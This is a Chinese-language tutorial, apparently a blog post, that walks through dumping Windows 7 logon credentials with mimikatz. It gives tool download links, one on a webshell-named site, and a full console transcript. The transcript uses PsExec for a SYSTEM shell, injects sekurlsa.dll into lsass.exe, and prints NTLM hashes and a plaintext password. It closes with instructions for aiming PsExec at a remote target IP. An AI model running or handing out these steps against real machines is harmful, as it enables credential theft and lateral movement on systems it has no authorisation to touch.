mimikatz下载地址:
http://www.webshell.cc/wp-content/uploads/2012/02/mimikatz_trunk.zip
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
blog.gentilkiwi.com应该是法国佬的博客。
用mimikatz来获取win7的密码:
Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Users\Administrator>cd C:\mimikatz_trunk\tools
C:\mimikatz_trunk\tools>PsExec.exe \\127.0.0.1 cmd.exe
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Windows\system32>cd C:\mimikatz_trunk\Win32
C:\mimikatz_trunk\Win32>mimikatz.exe mimikatz.exe
mimikatz 1.0 x86 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz # privilege::debug
Demande d'ACTIVATION du privil猫ge : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
PROCESSENTRY32(lsass.exe).th32ProcessID = 488
Attente de connexion du client...
Serveur connect茅 脿 un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des donn茅es de s茅curit茅s dans LSASS
mimikatz # @getLogonPasswords
Authentification Id : 0;395889
Package d'authentification : NTLM
Utilisateur principal : Administrator
Domaine d'authentification : WIN-S1J6267VPKL
msv1_0 : lm{ 7f6dc700e15e9f92aad3b435b51404ee }, ntlm{ 70829646e7
0fc9f291f87a41b9e158c5 }
wdigest : yang
tspkg : yang
Authentification Id : 0;155584
Package d'authentification : NTLM
Utilisateur principal : ANONYMOUS LOGON
Domaine d'authentification : NT AUTHORITY
msv1_0 : n.t. (LUID KO)
wdigest : n.t. (LUID KO)
tspkg : n.t. (LUID KO)
Authentification Id : 0;75419
Package d'authentification : NTLM
Utilisateur principal : Administrator
Domaine d'authentification : WIN-S1J6267VPKL
msv1_0 : lm{ 7f6dc700e15e9f92aad3b435b51404ee }, ntlm{ 70829646e7
0fc9f291f87a41b9e158c5 }
wdigest : yang
tspkg : yang
Authentification Id : 0;997
Package d'authentification : Negotiate
Utilisateur principal : LOCAL SERVICE
Domaine d'authentification : NT AUTHORITY
msv1_0 : n.t. (LUID KO)
wdigest :
tspkg : n.t. (LUID KO)
Authentification Id : 0;996
Package d'authentification : Negotiate
Utilisateur principal : WIN-S1J6267VPKL$
Domaine d'authentification : WORKGROUP
msv1_0 : n.t. (LUID KO)
wdigest :
tspkg : n.t. (LUID KO)
Authentification Id : 0;40847
Package d'authentification : NTLM
Utilisateur principal :
Domaine d'authentification :
msv1_0 : n.t. (LUID KO)
wdigest : n.t. (LUID KO)
tspkg : n.t. (LUID KO)
Authentification Id : 0;999
Package d'authentification : NTLM
Utilisateur principal : WIN-S1J6267VPKL$
Domaine d'authentification : WORKGROUP
msv1_0 : n.t. (LUID KO)
wdigest :
tspkg : n.t. (LUID KO)
mimikatz # exit
Fermeture du canal de communication
C:\mimikatz_trunk\Win32>
wdigest后面的就是密码。如上所示,我的win7的Administrator的密码是yang。
工具的作者的blog:http://blog.gentilkiwi.com/mimikatz
解释:
privilege::debug //提升权限
inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll" //注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)!
@getLogonPasswords //抓取密码
exit //退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环
另外,我测试的时候,是在win7上测试的。还可以在XP上来连接win7,只需要修改一下IP,例如:
PsExec.exe \\192.168.1.123 cmd.exe
把上面的192.168.1.123改为目标的IP。